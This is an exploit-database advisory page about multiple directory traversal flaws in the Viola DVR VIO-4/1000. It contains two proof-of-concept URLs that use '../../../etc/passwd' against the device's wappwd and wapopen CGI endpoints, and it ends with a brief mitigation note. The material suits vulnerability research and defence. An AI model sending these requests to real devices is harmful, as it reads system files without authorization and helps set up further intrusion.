header-logo
Suggest Exploit
vendor:
Viola DVR
by:
5.5
CVSS
MEDIUM
Directory Traversal
22
CWE
Product Name: Viola DVR
Affected Version From: Viola DVR VIO-4/1000
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Viola DVR Multiple Directory Traversal Vulnerabilities

Viola DVR is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.

Mitigation:

It is recommended to sanitize user-supplied input to prevent directory traversal attacks. Update the software to a patched version if available.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47509/info

Viola DVR is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.

Viola DVR VIO-4/1000 is vulnerable; other products may also be affected. 

http://www.example.com/cgi-bin/wappwd?FILEFAIL=../../../etc/passwd
http://www.example.com/cgi-bin/wapopen?FILECAMERA=../../../etc/passwd

Navigation

Suggest Exploit

Services By CQR